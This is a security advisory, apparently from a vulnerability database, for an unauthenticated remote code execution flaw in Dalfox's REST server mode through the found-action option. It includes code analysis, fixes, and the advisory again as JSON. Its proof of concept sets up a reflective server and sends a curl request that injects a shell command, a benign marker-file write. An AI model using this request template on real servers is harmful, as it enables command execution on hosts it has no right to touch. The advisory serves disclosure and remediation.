GHSA-V25V-M36W-JP4H

Vulnerability from github – Published: 2026-05-12 15:07 – Updated: 2026-05-12 15:07
VLAI
Summary
Dalfox Server Mode Vulnerable to Unauthenticated Remote Code Execution via `found-action`
Details

GHSA: Unauthenticated Remote Code Execution via found-action in Dalfox Server Mode

Summary

When dalfox is started in REST API server mode (dalfox server), the server binds to 0.0.0.0:6664 by default and requires no API key unless the operator explicitly passes --api-key. Because model.Options — including FoundAction and FoundActionShell — is deserialized directly from attacker-supplied JSON in POST /scan, and because dalfox.Initialize explicitly propagates those two fields into the final scan options without stripping them, any unauthenticated caller who can reach the server port can supply an arbitrary shell command that the dalfox process will execute on the host whenever a scan finding is triggered.

Severity

Critical (CVSS 3.1: 10.0)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

  • Attack Vector: Network — the server binds to 0.0.0.0 by default; reachable by any network peer.
  • Attack Complexity: Low — the attacker fully controls the scanned URL and can trivially host a one-line reflective server to guarantee a finding is triggered.
  • Privileges Required: None — no API key is enforced in the default configuration.
  • User Interaction: None.
  • Scope: Changed — exploitation escapes the dalfox process boundary and executes arbitrary commands on the host OS.
  • Confidentiality Impact: High — full read access to the host filesystem and secrets in the process environment.
  • Integrity Impact: High — arbitrary file writes, code deployment, persistence mechanisms.
  • Availability Impact: High — process kill, resource exhaustion, service disruption.

Affected Component

  • cmd/server.goinit() (line 51): --api-key defaults to ""
  • pkg/server/server.gosetupEchoServer() (line 68): auth middleware only registered when APIKey != ""
  • pkg/server/server.gopostScanHandler() (lines 173–191): rq.Options passed to ScanFromAPI without sanitization
  • lib/func.goInitialize() (lines 118–119): FoundAction / FoundActionShell explicitly propagated from caller options
  • pkg/scanning/foundaction.gofoundAction() (lines 17–18): exec.Command(options.FoundActionShell, "-c", afterCmd) executed unconditionally

CWE

  • CWE-306: Missing Authentication for Critical Function
  • CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
  • CWE-15: External Control of System or Configuration Setting

Description

Opt-in Authentication with a Dangerous Default

cmd/server.go registers the --api-key flag with an empty string default:

// cmd/server.go:51
serverCmd.Flags().StringVar(&apiKey, "api-key", "", "Specify the API key for server authentication...")

setupEchoServer only installs the apiKeyAuth middleware when that value is non-empty:

// pkg/server/server.go:68-70
if options.ServerType == "rest" && options.APIKey != "" {
    e.Use(apiKeyAuth(options.APIKey, options))
}

A server started without --api-key accepts every request on every route with no challenge. The apiKeyAuth implementation itself is correct — the flaw is purely in the opt-in condition that makes authentication off by default.

Attacker-Controlled Options Reaches Shell Execution Without Stripping

POST /scan deserializes the full model.Options struct from the JSON body:

// pkg/server/model.go:6-8
type Req struct {
    URL     string        `json:"url"`
    Options model.Options `json:"options"`
}

// pkg/server/server.go:173-191
rq := new(Req)
if err := c.Bind(rq); err != nil { ... }
go ScanFromAPI(rq.URL, rq.Options, *options, sid)

model.Options exposes both execution-control fields as JSON-tagged properties:

// pkg/model/options.go:83-84
FoundAction      string `json:"found-action,omitempty"`
FoundActionShell string `json:"found-action-shell,omitempty"`

ScanFromAPI builds the scan target directly from rqOptions and passes it to dalfox.Initialize:

// pkg/server/scan.go:22-27
target := dalfox.Target{
    URL:     url,
    Method:  rqOptions.Method,
    Options: rqOptions,
}
newOptions := dalfox.Initialize(target, target.Options)

Initialize explicitly copies both fields into newOptions — there is no stripping path:

// lib/func.go:118-119
"FoundAction":      {&newOptions.FoundAction, options.FoundAction},
"FoundActionShell": {&newOptions.FoundActionShell, options.FoundActionShell},

Shell Execution on Any Finding

foundAction is called from seven locations across pkg/scanning/scanning.go and pkg/scanning/sendReq.go whenever options.FoundAction != "" and any vulnerability is detected. None of these call sites check options.IsAPI:

// pkg/scanning/foundaction.go:12-18
func foundAction(options model.Options, target, query, ptype string) {
    afterCmd := options.FoundAction
    afterCmd = strings.ReplaceAll(afterCmd, "@@query@@", query)
    afterCmd = strings.ReplaceAll(afterCmd, "@@target@@", target)
    afterCmd = strings.ReplaceAll(afterCmd, "@@type@@", ptype)
    cmd := exec.Command(options.FoundActionShell, "-c", afterCmd)
    err := cmd.Run()
    ...
}

Because the attacker supplies both the scan target URL and found-action, they trivially guarantee that a finding is produced (by hosting a one-line reflective server) and that the shell command is executed.

Proof of Concept

# Step 1 — Start a reflective XSS target (attacker-controlled)
python3 - <<'PY'
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs
class H(BaseHTTPRequestHandler):
    def do_GET(self):
        q = parse_qs(urlparse(self.path).query).get('q', [''])[0]
        body = f'<html><body>{q}</body></html>'.encode()
        self.send_response(200)
        self.send_header('Content-Type', 'text/html')
        self.send_header('Content-Length', str(len(body)))
        self.end_headers()
        self.wfile.write(body)
    def log_message(self, *a): pass
HTTPServer(('127.0.0.1', 18081), H).serve_forever()
PY

# Step 2 — Start dalfox in REST server mode (default: 0.0.0.0:6664, no API key)
go run . server --host 127.0.0.1 --port 16664 --type rest

# Step 3 — POST unauthenticated scan request with found-action payload
curl -s -X POST http://127.0.0.1:16664/scan \
  -H 'Content-Type: application/json' \
  --data '{
    "url": "http://127.0.0.1:18081/?q=test",
    "options": {
      "found-action": "echo owned >/tmp/dalfox_rce_marker",
      "found-action-shell": "bash",
      "use-headless": false,
      "worker": 1,
      "limit-result": 1
    }
  }'

# Step 4 — Confirm arbitrary command executed on the dalfox host
cat /tmp/dalfox_rce_marker
# Expected output: owned

No X-API-KEY header is required. The reflective server ensures dalfox finds a vulnerability, which triggers foundAction.

Impact

  • Unauthenticated remote code execution on any host running dalfox server in its default configuration.
  • Full read access to secrets, configuration files, and credentials visible to the dalfox process.
  • Arbitrary file writes: persistence, backdoor installation, data exfiltration staging.
  • Lateral movement using the dalfox host's network position and credentials.
  • The default 0.0.0.0 bind address means exposure to all network interfaces, including public-facing ones in misconfigured cloud environments.

Recommended Remediation

Option 1: Require API key — make --api-key mandatory (preferred)

Reject server startup when no API key is provided and emit a loud warning. This is the lowest-risk fix because it protects all current and future routes without code changes to the scan path.

// cmd/server.go — in runServerCmd, before starting the server:
if serverType == "rest" && apiKey == "" {
    fmt.Fprintln(os.Stderr, "ERROR: --api-key is required when running in REST server mode.")
    fmt.Fprintln(os.Stderr, "       Generate a key with: openssl rand -hex 32")
    os.Exit(1)
}

Option 2: Strip FoundAction / FoundActionShell from API-sourced requests

Prevent untrusted callers from setting execution-control options regardless of auth state. This adds defence-in-depth and protects authenticated deployments against credential theft.

// pkg/server/server.go — in postScanHandler, before calling ScanFromAPI:
rq.Options.FoundAction = ""
rq.Options.FoundActionShell = ""

Both options should be applied together. Option 1 prevents unauthenticated access; Option 2 ensures that even authenticated callers (who may be external consumers of the REST API) cannot trigger host-level command execution.

Credit

Emmanuel David

Github:- https://github.com/drmingler

Severity
10.0 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.12.0"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/hahwul/dalfox/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.13.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-45087"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-15",
      "CWE-306",
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-12T15:07:59Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "# GHSA: Unauthenticated Remote Code Execution via `found-action` in Dalfox Server Mode\n\n## Summary\n\nWhen dalfox is started in REST API server mode (`dalfox server`), the server binds to `0.0.0.0:6664` by default and requires no API key unless the operator explicitly passes `--api-key`. Because `model.Options` \u2014 including `FoundAction` and `FoundActionShell` \u2014 is deserialized directly from attacker-supplied JSON in `POST /scan`, and because `dalfox.Initialize` explicitly propagates those two fields into the final scan options without stripping them, any unauthenticated caller who can reach the server port can supply an arbitrary shell command that the dalfox process will execute on the host whenever a scan finding is triggered.\n\n## Severity\n\n**Critical** (CVSS 3.1: 10.0)\n\n`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`\n\n- **Attack Vector:** Network \u2014 the server binds to `0.0.0.0` by default; reachable by any network peer.\n- **Attack Complexity:** Low \u2014 the attacker fully controls the scanned URL and can trivially host a one-line reflective server to guarantee a finding is triggered.\n- **Privileges Required:** None \u2014 no API key is enforced in the default configuration.\n- **User Interaction:** None.\n- **Scope:** Changed \u2014 exploitation escapes the dalfox process boundary and executes arbitrary commands on the host OS.\n- **Confidentiality Impact:** High \u2014 full read access to the host filesystem and secrets in the process environment.\n- **Integrity Impact:** High \u2014 arbitrary file writes, code deployment, persistence mechanisms.\n- **Availability Impact:** High \u2014 process kill, resource exhaustion, service disruption.\n\n\n## Affected Component\n\n- `cmd/server.go` \u2014 `init()` (line 51): `--api-key` defaults to `\"\"`\n- `pkg/server/server.go` \u2014 `setupEchoServer()` (line 68): auth middleware only registered when `APIKey != \"\"`\n- `pkg/server/server.go` \u2014 `postScanHandler()` (lines 173\u2013191): `rq.Options` passed to `ScanFromAPI` without sanitization\n- `lib/func.go` \u2014 `Initialize()` (lines 118\u2013119): `FoundAction` / `FoundActionShell` explicitly propagated from caller options\n- `pkg/scanning/foundaction.go` \u2014 `foundAction()` (lines 17\u201318): `exec.Command(options.FoundActionShell, \"-c\", afterCmd)` executed unconditionally\n\n## CWE\n\n- **CWE-306**: Missing Authentication for Critical Function\n- **CWE-78**: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)\n- **CWE-15**: External Control of System or Configuration Setting\n\n## Description\n\n### Opt-in Authentication with a Dangerous Default\n\n`cmd/server.go` registers the `--api-key` flag with an empty string default:\n\n```go\n// cmd/server.go:51\nserverCmd.Flags().StringVar(\u0026apiKey, \"api-key\", \"\", \"Specify the API key for server authentication...\")\n```\n\n`setupEchoServer` only installs the `apiKeyAuth` middleware when that value is non-empty:\n\n```go\n// pkg/server/server.go:68-70\nif options.ServerType == \"rest\" \u0026\u0026 options.APIKey != \"\" {\n    e.Use(apiKeyAuth(options.APIKey, options))\n}\n```\n\nA server started without `--api-key` accepts every request on every route with no challenge. The `apiKeyAuth` implementation itself is correct \u2014 the flaw is purely in the opt-in condition that makes authentication off by default.\n\n### Attacker-Controlled `Options` Reaches Shell Execution Without Stripping\n\n`POST /scan` deserializes the full `model.Options` struct from the JSON body:\n\n```go\n// pkg/server/model.go:6-8\ntype Req struct {\n    URL     string        `json:\"url\"`\n    Options model.Options `json:\"options\"`\n}\n\n// pkg/server/server.go:173-191\nrq := new(Req)\nif err := c.Bind(rq); err != nil { ... }\ngo ScanFromAPI(rq.URL, rq.Options, *options, sid)\n```\n\n`model.Options` exposes both execution-control fields as JSON-tagged properties:\n\n```go\n// pkg/model/options.go:83-84\nFoundAction      string `json:\"found-action,omitempty\"`\nFoundActionShell string `json:\"found-action-shell,omitempty\"`\n```\n\n`ScanFromAPI` builds the scan target directly from `rqOptions` and passes it to `dalfox.Initialize`:\n\n```go\n// pkg/server/scan.go:22-27\ntarget := dalfox.Target{\n    URL:     url,\n    Method:  rqOptions.Method,\n    Options: rqOptions,\n}\nnewOptions := dalfox.Initialize(target, target.Options)\n```\n\n`Initialize` explicitly copies both fields into `newOptions` \u2014 there is no stripping path:\n\n```go\n// lib/func.go:118-119\n\"FoundAction\":      {\u0026newOptions.FoundAction, options.FoundAction},\n\"FoundActionShell\": {\u0026newOptions.FoundActionShell, options.FoundActionShell},\n```\n\n### Shell Execution on Any Finding\n\n`foundAction` is called from seven locations across `pkg/scanning/scanning.go` and `pkg/scanning/sendReq.go` whenever `options.FoundAction != \"\"` and any vulnerability is detected. None of these call sites check `options.IsAPI`:\n\n```go\n// pkg/scanning/foundaction.go:12-18\nfunc foundAction(options model.Options, target, query, ptype string) {\n    afterCmd := options.FoundAction\n    afterCmd = strings.ReplaceAll(afterCmd, \"@@query@@\", query)\n    afterCmd = strings.ReplaceAll(afterCmd, \"@@target@@\", target)\n    afterCmd = strings.ReplaceAll(afterCmd, \"@@type@@\", ptype)\n    cmd := exec.Command(options.FoundActionShell, \"-c\", afterCmd)\n    err := cmd.Run()\n    ...\n}\n```\n\nBecause the attacker supplies both the scan target URL and `found-action`, they trivially guarantee that a finding is produced (by hosting a one-line reflective server) and that the shell command is executed.\n\n## Proof of Concept\n\n```bash\n# Step 1 \u2014 Start a reflective XSS target (attacker-controlled)\npython3 - \u003c\u003c\u0027PY\u0027\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nfrom urllib.parse import urlparse, parse_qs\nclass H(BaseHTTPRequestHandler):\n    def do_GET(self):\n        q = parse_qs(urlparse(self.path).query).get(\u0027q\u0027, [\u0027\u0027])[0]\n        body = f\u0027\u003chtml\u003e\u003cbody\u003e{q}\u003c/body\u003e\u003c/html\u003e\u0027.encode()\n        self.send_response(200)\n        self.send_header(\u0027Content-Type\u0027, \u0027text/html\u0027)\n        self.send_header(\u0027Content-Length\u0027, str(len(body)))\n        self.end_headers()\n        self.wfile.write(body)\n    def log_message(self, *a): pass\nHTTPServer((\u0027127.0.0.1\u0027, 18081), H).serve_forever()\nPY\n\n# Step 2 \u2014 Start dalfox in REST server mode (default: 0.0.0.0:6664, no API key)\ngo run . server --host 127.0.0.1 --port 16664 --type rest\n\n# Step 3 \u2014 POST unauthenticated scan request with found-action payload\ncurl -s -X POST http://127.0.0.1:16664/scan \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  --data \u0027{\n    \"url\": \"http://127.0.0.1:18081/?q=test\",\n    \"options\": {\n      \"found-action\": \"echo owned \u003e/tmp/dalfox_rce_marker\",\n      \"found-action-shell\": \"bash\",\n      \"use-headless\": false,\n      \"worker\": 1,\n      \"limit-result\": 1\n    }\n  }\u0027\n\n# Step 4 \u2014 Confirm arbitrary command executed on the dalfox host\ncat /tmp/dalfox_rce_marker\n# Expected output: owned\n```\n\nNo `X-API-KEY` header is required. The reflective server ensures dalfox finds a vulnerability, which triggers `foundAction`.\n\n## Impact\n\n- **Unauthenticated remote code execution** on any host running `dalfox server` in its default configuration.\n- Full read access to secrets, configuration files, and credentials visible to the dalfox process.\n- Arbitrary file writes: persistence, backdoor installation, data exfiltration staging.\n- Lateral movement using the dalfox host\u0027s network position and credentials.\n- The default `0.0.0.0` bind address means exposure to all network interfaces, including public-facing ones in misconfigured cloud environments.\n\n## Recommended Remediation\n\n### Option 1: Require API key \u2014 make `--api-key` mandatory (preferred)\n\nReject server startup when no API key is provided and emit a loud warning. This is the lowest-risk fix because it protects all current and future routes without code changes to the scan path.\n\n```go\n// cmd/server.go \u2014 in runServerCmd, before starting the server:\nif serverType == \"rest\" \u0026\u0026 apiKey == \"\" {\n    fmt.Fprintln(os.Stderr, \"ERROR: --api-key is required when running in REST server mode.\")\n    fmt.Fprintln(os.Stderr, \"       Generate a key with: openssl rand -hex 32\")\n    os.Exit(1)\n}\n```\n\n### Option 2: Strip `FoundAction` / `FoundActionShell` from API-sourced requests\n\nPrevent untrusted callers from setting execution-control options regardless of auth state. This adds defence-in-depth and protects authenticated deployments against credential theft.\n\n```go\n// pkg/server/server.go \u2014 in postScanHandler, before calling ScanFromAPI:\nrq.Options.FoundAction = \"\"\nrq.Options.FoundActionShell = \"\"\n```\n\nBoth options should be applied together. Option 1 prevents unauthenticated access; Option 2 ensures that even authenticated callers (who may be external consumers of the REST API) cannot trigger host-level command execution.\n\n##Credit\n\nEmmanuel David\n\nGithub:- https://github.com/drmingler",
  "id": "GHSA-v25v-m36w-jp4h",
  "modified": "2026-05-12T15:07:59Z",
  "published": "2026-05-12T15:07:59Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/hahwul/dalfox/security/advisories/GHSA-v25v-m36w-jp4h"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/hahwul/dalfox"
    },
    {
      "type": "WEB",
      "url": "https://github.com/hahwul/dalfox/releases/tag/v2.13.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Dalfox Server Mode Vulnerable to Unauthenticated Remote Code Execution via `found-action`"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.